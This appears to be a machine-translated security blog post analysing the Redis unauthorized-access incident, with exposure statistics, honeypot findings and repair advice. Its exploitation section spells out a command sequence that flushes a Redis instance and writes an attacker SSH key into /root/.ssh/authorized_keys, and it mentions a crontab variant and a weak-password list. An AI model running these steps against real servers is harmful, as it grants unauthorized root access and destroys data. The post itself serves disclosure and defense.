Comprehensive Analysis of Redis events

Comprehensive Analysis of Redis events

0 × 00 Preface

Unauthorized access to redis has not been paid much attention to until November 4. This blog was published: redis can control the server by writing an SSH Key, and security personnel began to pay close attention to this incident.

0 × 01 vulnerability Overview

Redis exposed to the public network can be maliciously logged on by attackers if it does not enable the authentication service or uses a weak password key pair. Attackers can control the server by writing the SSH Public Key or writing the crontab command to execute the command.

0 × 02 impact

Baidu titan.com detects redis on the default port of the entire network. After two days of data comparison, it is found that redis has not been valued by Party.

 

The weak password is selected as follows:

Username rootadminredisadministratorwebadminsysadminnetadmin password 12345612345123456789passwordiloveyouredisrootadmin123456781234567

Domestic redis status:

China is the most dangerous country. The main data is as follows:

 

Distribution of major cities with unauthorized access to redis in China:

 

0 × 03 vulnerability Exploitation

Method 1:

Use the Redis set method to write your own SSH public key file to the user/. ssh directory to enable ssh login without authentication.

$ Ssh-keygen-t rsa // generate the Public Key $ (echo-e "\ n"; cat id_rsa.pub; echo-e "\ n")> foo.txt // process the file written to the Public key format $ redis-cli-h 192.168.1.11 flushall // log on to redis to delete all databases and keys (ensure that the written data is not mixed with other data, so use it with caution) $ cat foo.txt | redis-cli-h 192.168.1.11-x set crackit // write data $ redis-cli-h 192.168.1.11 192.168.1.11: 6379> config set dir/root /. ssh/set save path 192.168.1.11: 6379> config set dbfilename "authorized_keys" set database name 192.168.1.11: 6379> sav E. Saving the database content to/root/. ssh/authorized_keys will overwrite the previous authorized_keys, which will cause the previously set login-free invalidation.

Method 2:

Write to crontab for execution.

Run the set1 'xxx' command in Redis to ensure that the data is always written at the beginning. However, the data is written successfully, but the data is large (source pig @ wooyun ).

Crontab has loose requirements on the format of the file to be executed.

Write Data to the/var/spool/cron directory in centos.

Refer to method 1.

0 × 04 vulnerability tracking

In our self-deployed Honeypot, we use redis monitor for monitoring.

redis-cli -h xx.xx.xx. monitor >ksdf.log

Then monitor the log.

One honeypot captured an intrusion command within one hour.

 

Greetings from our Ukrainian compatriot 46.151.53.230. This IP address hits the proxy list we collected and may be just a stepping stone machine.

The Public Key is as follows:

ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQC/Z+/g2nHKXaWxCJD1wpFRt8EuBi1ud2kIyouw+YN3JlAmslKAKCiHURwDs4n/gCwQZsw6cK3diLJj2yJ7IeWMaCNN5TeMhKnapyNV4FylrykBWOEJ+BW0Nlp1ntqAmE0rU+UslfroIjxMuzAJlGNbSe4oHiS6X2vdvYD6mYmqptnHjPhE58vqkjMiC1qpqR67G6Is+TX3IWrDLXVv6HQkLMqUVz+LU3m1/lCS/32xjBQwPzRf9ZY8sUb+aGMe0/jtQSiZCvCsm1O2ZlETgWLGgDQMlDfDc3rsOLsSZVG5L018+h6TdcKqKSDstLq76Jd[email protected]

Other public keys obtained are as follows:

[email protected]kRa0Zf89o0wRwumGKKCxwMJ6jl2pGpmETcFHgFUOUt/bOmnAqpIQUGmsF5Ta9EOKJbwaoxzGMsvenvNF+baGUe7rdAHEfc/IGemsAm6InI8nKUP/Qarm9572ORwoPk/jNY6i5bQLPeuRIcE4wnazQf7PW0qxitTAn2ejhDfbJRMiBm6eBL0ghgjJ3d1EddhKuC11/Iyx+SBo2RdSJM6w+3nIT6PWirlzgQCHcmY+0IaY1vfRpbyH14FEWIjEGNB68agpdO8YGtmSMPh6RxAghdIpbuOEqzrOf/[email protected]

ssh-rsaAAAAB3NzaC1yc2EAAAADAQABAAABAQCcuHEVMRqY/Co/RJ5o5RTZmpl6sZ7U6w39WAvM7Scl7nGvr5mS4MRRIDaoAZpw7sPjmBHz2HwvAPYGCekcIVk8Xzc3p31v79fWeLXXyxts0jFZ8YZhYMZiugOgCKvRIs63DFf1gFoM/OHUyDHosi8E6BOi7ANqupScN8cIxDGsXMFr4EbQn4DoFeRTKLg5fHL9qGamaXXZRECkWHmjFYUZGjgeAiSYdZR49X36jQ6nuFBM18cEZe5ZkxbbtubnbAOMrB52tQX4RrOqmuWVE/Z0uCOBlbbG+9sKyY9wyp/aHLnRiyC8GBvbrZqQmyn9Yu1zBp3tY8Tt6DWmo6BLZV4/[email protected]

Summary:

Since Redis is overwrite, multiple hackers or groups have been competing for the Final write.

If you find that your Redis instance is suddenly cleared, only

"Crackit" or other strange keys, congratulations.

0 × 05 repair suggestions

1. Add authentication to your Redis instance. Do not expose yourself to the public network or enable Redis as root unless necessary. 2. Use iptables to enable a whitelist for a fixed port. 3. view your authorized_keys and crontab tasks. If the task contains the beginning of REDIS, reset it. 4. Check chkrootkit and rootkit hunter to check the rootkit.